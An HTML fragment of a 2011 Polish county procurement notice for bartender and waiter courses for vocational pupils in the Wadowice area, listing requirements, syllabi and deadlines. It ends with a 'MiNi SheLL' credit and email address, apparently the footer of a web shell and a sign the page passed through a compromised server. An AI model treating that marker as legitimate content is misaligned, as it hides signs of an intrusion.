<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.wadowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Wadowicach ul. Batorego 2, 34-100 Wadowice, pok nr 104 (I piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2011 godzina 10:30, miejsce: Starostwo Powiatowe w Wadowicach ul. Batorego 2, 34-100 Wadowice, sekretariat pok nr 314 (III piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Modernizacja kształcenia zawodowego w Małopolsce w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1. Organizacja i przeprowadzenie kursu barmana dla uczniów Zespołu Szkół RCKU w Radoczy i dla  uczniów Zespołu Szkół nr 2 w Andrychowie w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowe wymagania związane z realizacją przedmiotu zamówienia:
Zadanie 1. Organizacja i przeprowadzenie kursu barmana dla uczniów Zespołu Szkół RCKU w Radoczy i dla  uczniów Zespołu Szkół nr 2 w Andrychowie w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce,
Miejsce przeprowadzenia kursu:  Zespół Szkół nr  2 w Andrychowie, ul. Batorego 9 oraz Zespół Szkół RCKU w Radoczy, Radocza 14. Zamawiający udostępni Wykonawcy pomieszczenia do przeprowadzenia kursu w Zespole Szkół nr 2 w Andrychowie oraz w Zespole Szkół RCKU w Radoczy. 
Wykonawca nie ponosi kosztów wynajęcia sali.
Wykonawca lub osoba zatrudniona do realizacji kursu barmana winna posiadać Certyfikat ukończenia kursu od Polskiego Stowarzyszenia Barmanów w stopniu najwyższym - etapowo oraz udokumentowane minimum 3-letnie doświadczenie w prowadzeniu szkoleń barmańskich.
Planowana ilość osób: 
I grupa: uczniowie z Zespołu Szkół Rolnicze Centrum Kształcenia Ustawicznego w Radoczy - 10 osób,
II grupa: uczniowie z Zespołu  Szkół nr  2 w Andrychowie - 25 osób (z podziałem na Grupę A - 10 osób i Grupę B - 15 osób).
Termin przeprowadzenia kursu: 
dla grupy I -  do 22 czerwca 2011 roku (ZS RCKU Radocza),
dla grupy II  - Grupa A - 10 osób do 22 czerwca 2011 roku (ZS 2 A-chów),
                 - Grupa B - 15 osób - realizacja kursu w okresie od 1 do 30 września 2011 roku (ZS 2 A-chów).
Kurs powinien obejmować łącznie 40 godzin dla każdej z grup (3) w tym 30 godzin nauki praktycznej i 10 godzin nauki teoretycznej. Godzina zajęć odpowiada 45 minutom. W trakcie przeprowadzania kursu przewidziane są 2 przerwy po pół godziny. Ponadto Wykonawca po uzgodnieniu z uczestnikami kursu może zorganizować po każdych przeprowadzonych 45 minutach zajęć projektowych 5-minutową  przerwę. Zajęcia mogą odbywać się codziennie w godzinach popołudniowych po zakończeniu zajęć szkolnych oraz w soboty od 9.00 do 16.00 po wcześniejszym ustaleniu terminu z liderem projektu w szkole. Wykonawca przedłoży szczegółowy program zajęć ze wskazaniem ilości godzin zajęć na poszczególną tematykę.
Wykonawca zobowiązany jest do zapewnienia warunków zgodnych z przepisami BHP w trakcie trwania kursu. Wykonawca zapewni odpowiedni sprzęt (shakery, miarki barmańskie, łyżki barmańskie do stirowania, szczypce o różnej wielkości, zestaw szkła barowego różnych wzorów do podawania napojów alkoholowych, bezalkoholowych i mieszanych, trybuszon, kubki barmańskie, blender elektryczny, młynek do rozdrabniania lodu, dwa komplety zestawów noży dekoracyjnych, dzbanki o różnej wielkości do kawy, soków i wody, cooler, mudler, ekspres ciśnieniowy do kawy, surowce i niezbędne produkty np. soki owocowe, wody gazowane i niegazowane, owoce do dekoracji itp., ozdoby papierowe i plastikowe do drinków i napojów np. parasolki) oraz materiały dydaktyczne do prawidłowej realizacji programu kursu dla każdego uczestnika. 
Po zakończeniu kursu Wykonawca wyda uczestnikom kursu zaświadczenie Ministerstwa Edukacji Narodowej (MEN) i certyfikat w języku polskim i angielskim. W związku z realizacją kursu w ramach projektu współfinansowanego przez Europejski Fundusz Społeczny zaświadczenie MEN i certyfikat w języku polskim i angielskim winno być opatrzone logo Programu Operacyjnego Kapitał Ludzki (POKL), Unii Europejskiej Europejski Fundusz Społeczny (UE EFS), Województwa Małopolskiego 
i Powiatu Wadowickiego i Modernizacji kształcenia zawodowego w Małopolsce (MKZ) - (wzór logo POKL, UF EFS, województwa i powiatu przekaże zamawiający).
Dokumenty jakie winien przedłożyć Wykonawca po zakończeniu kursu:
W związku z realizacją kursu w ramach projektu współfinansowanego przez Europejski Fundusz Społeczny dokumenty winny być opatrzone logo Programu Operacyjnego Kapitał Ludzki (POKL), Unii Europejskiej Europejski Fundusz Społeczny (UE EFS), Województwa Małopolskiego i Powiatu Wadowickiego i Modernizacji kształcenia zawodowego w Małopolsce (MKZ) - (wzór logo POKL, UF EFS, województwa i powiatu przekaże zamawiający).
a) listę obecności uczestników kursu (z każdego dnia zajęć) na zajęciach teoretycznych i praktycznych, 
b) dziennik zajęć,
c) potwierdzenie odbioru materiałów dydaktycznych przez uczestników kursu,
d) protokół z egzaminu wewnętrznego z wynikami egzaminu,
e) karta egzaminacyjna,
f) kserokopie  certyfikatów w języku polskim i angielskim,
g) potwierdzenie odbioru certyfikatów w języku polskim i angielskim, 
h) imienny wykaz osób, które ukończyły i które nie ukończyły kurs.
Tematyka zajęć:
1)	Wprowadzenie i terminologia
- barman jako zawód - charakterystyka pracy barmana (organizacja pracy w barze, predyspozycje do wykonywania zawodu), 
- barmańskie savoir-vivre - praca z klientem i z współpracownikami lokalu,
2)  Bar jako miejsce pracy - wyposażenie baru i prezentacja przyrządów barmana
- podział na typy barów, 
- umeblowanie i wyposażenie baru w sprzęt i produkty, aranżacja, 
3) Towaroznawstwo napojów alkoholowych, bezalkoholowych i mieszanych
- podział alkoholi n podstawowe grupy: piwo, wino, wódki białe i gatunkowe, brandy, koniaki, likiery, whisky, wermuty i miody pitne,
- aperitif, digestif, 
- wpływ alkoholu na organizm człowieka
4) Podstawy miksologii
- charakterystyka napojów (cocktaile, rodzaje drinków: long, short i inne), 
- techniki miksowania i mieszania napojów, 
- zastosowanie receptur, 
- dobór zastawy stołowej (szkło barowe, miarki) i elementów dekoracyjnych,
- zasady sporządzania i podawania napojów, 
- kultura spożywania napojów alkoholowych, bezalkoholowych i mieszanych, 
5) Nauka sporządzania wybranych drinków
6) Kawa w barze - nauka sporządzania drinków na bazie kawy
- ekspres do kawy ciśnieniowy,
- zasady parzenia i serwowania kawy,
- drinki na bazie kawy, 
- nauka sporządzania wybranych drinków na bazie kawy.
7) Free style
- czym jest free style, 
- zasady i techniki free style, 
- pokazy
8) Egzamin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 Organizacja i przeprowadzenie kursu barmaństwa klasycznego dla uczniów Zespołu Szkół nr 3 w Wadowicach w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2 Organizacja i przeprowadzenie kursu barmaństwa klasycznego dla uczniów Zespołu Szkół nr 3 w Wadowicach w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce,
Miejsce przeprowadzenia kursu:  Zespół Szkół nr 3 w Wadowicach, ul. Wojska Polskiego 13 
Zamawiający udostępni Wykonawcy pomieszczenia do przeprowadzenia kursu w Zespole Szkół nr 3 w Wadowicach. 
Wykonawca nie ponosi kosztów wynajęcia sali.
Wykonawca lub osoba zatrudniona do realizacji kursu barmaństwa klasycznego winna posiadać Certyfikat ukończenia kursu od Polskiego Stowarzyszenia Barmanów w stopniu najwyższym - etapowo oraz udokumentowane minimum 3-letnie doświadczenie w prowadzeniu szkoleń barmańskich.
Planowana ilość osób: 
Uczniowie z Zespołu Szkół nr 3 w Wadowicach - 15 osób,
Termin przeprowadzenia kursu: do 22 czerwca 2011 roku
Program powinien obejmować 40 godzin zajęć, w tym zajęć praktycznych 30 godzin i 10 godzin nauki teoretycznej. Godzina zajęć odpowiada 45 minutom. W trakcie przeprowadzania kursu przewidziane są 2 przerwy po pół godziny. Ponadto Wykonawca po uzgodnieniu z uczestnikami kursu może zorganizować po każdych przeprowadzonych 45 minutach zajęć projektowych 5 minutową  przerwę. Zajęcia mogą odbywać się codziennie w godzinach popołudniowych po zakończeniu zajęć szkolnych oraz w soboty od 9.00 do 16.00 po wcześniejszym ustaleniu terminu z liderem projektu w szkole. Wykonawca przedłoży szczegółowy program zajęć ze wskazaniem ilości godzin zajęć na poszczególną tematykę.
Wykonawca zobowiązany jest do zapewnienia warunków zgodnych z przepisami BHP w trakcie trwania kursu. Wykonawca zapewni odpowiedni sprzęt (shakery, miarki barmańskie, łyżki barmańskie do stirowania, szczypce o różnej wielkości, zestaw szkła barowego różnych wzorów do podawania napojów alkoholowych, bezalkoholowych i mieszanych, trybuszon, kubki barmańskie, blender elektryczny, młynek do rozdrabniania lodu, dwa komplety zestawów noży dekoracyjnych, dzbanki o różnej wielkości do kawy, soków i wody, cooler, mudler, ekspres ciśnieniowy do kawy, surowce i niezbędne produkty np. soki owocowe, wody gazowane i niegazowane, owoce do dekoracji itp., ozdoby papierowe i plastikowe do drinków i napojów np. parasolki) oraz materiały dydaktyczne do prawidłowej realizacji programu kursu dla każdego uczestnika.
Po zakończeniu kursu Wykonawca wyda uczestnikom kursu zaświadczenie Ministerstwa Edukacji Narodowej (MEN) i certyfikat w języku polskim i angielskim. W związku z realizacją kursu w ramach projektu współfinansowanego przez Europejski Fundusz Społeczny zaświadczenie MEN i certyfikat w języku polskim i angielskim winno być opatrzone logo Programu Operacyjnego Kapitał Ludzki (POKL), Unii Europejskiej Europejski Fundusz Społeczny (UE EFS), Województwa Małopolskiego i Powiatu Wadowickiego i Modernizacji kształcenia zawodowego w Małopolsce (MKZ) - (wzór logo POKL, UF EFS, województwa i powiatu przekaże zamawiający).
Dokumenty jakie winien przedłożyć Wykonawca po zakończeniu kursu:
W związku z realizacją kursu w ramach projektu współfinansowanego przez Europejski Fundusz Społeczny dokumenty winny być opatrzone logo Programu Operacyjnego Kapitał Ludzki (POKL), Unii Europejskiej Europejski Fundusz Społeczny (UE EFS), Województwa Małopolskiego i Powiatu Wadowickiego i Modernizacji kształcenia zawodowego w Małopolsce (MKZ) - (wzór logo POKL, UF EFS, województwa i powiatu przekaże zamawiający):
a) listę obecności uczestników kursu (z każdego dnia zajęć) na zajęciach teoretycznych i praktycznych, 
b) dziennik zajęć,
c) potwierdzenie odbioru materiałów dydaktycznych przez uczestników kursu,
d) protokół z egzaminu wewnętrznego z wynikami egzaminu,
e) karta egzaminacyjna,
f) kserokopie  certyfikatów w języku polskim i angielskim,
g) potwierdzenie odbioru certyfikatów w języku polskim i angielskim, 
h) imienny wykaz osób, które ukończyły i które nie ukończyły kurs.
Tematyka zajęć:
 1.	Wprowadzenie i terminologia 
- barman jako zawód, 
- barmańskie savoir-vivre,
- praca z klientem, 
- barman szefem lokalu,
 2.	Bar jako miejsce pracy. Alkohol jako używka albo atrybut kultury 
- podział na typy barów, 
- umeblowanie i wyposażenie, aranżacja, 
- wyposażenie podręczne, 
- podział alkoholi, 
- aperitif, digestif, 
- wpływ alkoholu na organizm człowieka,
 3.	Podstawy miksologii:
-  cocktaile, rodzaje drinków, drinki światowe i lokalne, 
- dodatki i składniki dekoracyjne, 
- szkło barowe, miary, 
- dodatki uzupełniające,
 4.	Nauka sporządzania wybranych drinków
 5.	Kawa w barze
- nauka sporządzania drinków na bazie kawy
- ekspres ciśnieniowy do kawy, 
- zasady parzenia i serwowania kawy, 
- drink na bazie kawy, 
- nauka sporządzania wybranych drinków,
 6.	Free style
- czym jest free style, 
- zasady i techniki free style, 
- pokazy
 7.	Egzamin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 Organizacja i przeprowadzenie kursu kelnera dla uczniów Zespołu Szkół RCKU 
w Radoczy, w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 3 Organizacja i przeprowadzenie kursu kelnera dla uczniów Zespołu Szkół RCKU w Radoczy, w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce.
Miejsce przeprowadzenia kursu: Zespół Szkół RCKU w Radoczy, Radocza 14. 
Zamawiający udostępni Wykonawcy pomieszczenia do przeprowadzenia kursu w Zespole Szkół RCKU w Radoczy. 
Wykonawca nie ponosi kosztów wynajęcia sali.
Wykonawca lub osoba zatrudniona do realizacji kursu kelnera winna posiadać udokumentowane minimum 3-letnie doświadczenie w prowadzeniu szkoleń kelnerskich.
Planowana ilość osób: uczniowie z Zespołu Szkół Rolnicze Centrum Kształcenia Ustawicznego w Radoczy - 10 osób.
Termin przeprowadzenia kursu:   do 22 czerwca 2011 roku,
Program powinien obejmować 32 godziny zajęć. Godzina zajęć odpowiada 45 minutom. W trakcie przeprowadzania kursu przewidziane są 2 przerwy po pół godziny. Ponadto Wykonawca po uzgodnieniu z uczestnikami kursu może zorganizować po każdych przeprowadzonych 45 minutach zajęć projektowych 5 minutową  przerwę. Zajęcia mogą odbywać się codziennie w godzinach popołudniowych po zakończeniu zajęć szkolnych oraz w soboty od 9.00 do 16.00 po wcześniejszym ustaleniu terminu z liderem projektu w szkole. Wykonawca przedłoży szczegółowy program zajęć ze wskazaniem ilości godzin zajęć na poszczególną tematykę.
Wykonawca zobowiązany jest do zapewnienia warunków zgodnych z przepisami BHP w trakcie trwania kursu. Wykonawca zapewni odpowiedni sprzęt (karty dań,  tace i tacki, bielizna stołowa (obrusy i serwety), serwetki materiałowe (do nauki składania serwetek), komplet zastawy stołowej, komplet szkła (kieliszki do wina białego, do wina czerwonego, do wody, do wódki, literatki), komplet sztućców, sprzęt do flambirowania oraz materiały dydaktyczne,  surowce i niezbędne produkty do prawidłowej realizacji programu kursu dla każdego uczestnika.
Po zakończeniu kursu Wykonawca wyda uczestnikom kursu zaświadczenie Ministerstwa Edukacji Narodowej (MEN) i certyfikat w języku polskim i angielskim. W związku z realizacją kursu w ramach projektu współfinansowanego przez Europejski Fundusz Społeczny zaświadczenie MEN i certyfikat w języku polskim i angielskim winno być opatrzone logo Programu Operacyjnego Kapitał Ludzki (POKL), Unii Europejskiej Europejski Fundusz Społeczny (UE EFS), Województwa Małopolskiego i Powiatu Wadowickiego i Modernizacji kształcenia zawodowego w Małopolsce (MKZ) - (wzór logo POKL, UF EFS, województwa i powiatu przekaże zamawiający).
Dokumenty jakie winien przedłożyć Wykonawca po zakończeniu kursu:
W związku z realizacją kursu w ramach projektu współfinansowanego przez Europejski Fundusz Społeczny dokumenty winny być opatrzone logo Programu Operacyjnego Kapitał Ludzki (POKL), Unii Europejskiej Europejski Fundusz Społeczny (UE EFS), Województwa Małopolskiego i Powiatu Wadowickiego i Modernizacji kształcenia zawodowego w Małopolsce (MKZ) - (wzór logo POKL, UF EFS, województwa i powiatu przekaże zamawiający):
a) listę obecności uczestników kursu (z każdego dnia zajęć) na zajęciach teoretycznych i praktycznych, 
b) dziennik zajęć,
c) potwierdzenie odbioru materiałów dydaktycznych przez uczestników kursu,
d) protokół z egzaminu wewnętrznego z wynikami egzaminu,
e) karta egzaminacyjna,
f) kserokopie  certyfikatów w języku polskim i angielskim,
g) potwierdzenie odbioru certyfikatów w języku polskim i angielskim, 
h) imienny wykaz osób, które ukończyły i które nie ukończyły kurs.
Tematyka zajęć (32 godziny)
1)	Sylwetka kelnera 
-	ubiór i wizerunek zewnętrzny kelnera i kelnerki
-	podstawowe służbowe wyposażenie kelnera (zaplecze kelnerskie, pomocnik kelnerski), 
-	ćwiczenia w noszeniu tac i tacek, 
-	ćwiczenia z zakresu serwowania dań i napojów, 
2)	Wyposażenie sali konsumenckiej 
- bielizna stołowa,
- zastawa stołowa, 
- zasady nakrywania stołów (sposoby składania i rozkładania obrusów, zmiana obrusów w obecności konsumenta), 
- dekoracje stołów w zależności od rodzaju imprezy, 
- sztuka układania serwetek (sposoby układania serwetek - na leżąco i stojąco w zależności od rodzaju serwowanych dań), 
- sztuka układania sztucców i nakrywania stołów(zachowanie odpowiedniej kolejności przy nakrywaniu), 
- technika noszenia zastawy stołowej i szkła oraz tac,
3) Zasady obsługi konsumentów
- powitanie konsumenta,
- serwis, 
- podziękowanie i pożegnanie, 
- podawanie rachunku,
- metody serwowania, 
- kolejność podawania potraw i napojów, 
- prezentacja i podawanie napojów alkoholowych, 
- zasady zbierania zastawy stołowej po konsumpcji, 
- zasady przygotowywania deserów w obecności konsumenta - flambirowanie 
4) Imprezy okolicznościowe
- zasady przygotowywania imprez okolicznościowych - bankietów siedzących i stojących, 
- obsługa imprez okolicznościowych
5) Przeprowadzenie końcowego egzaminu wewnętrznego z zakresu stanowiącego przedmiot kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com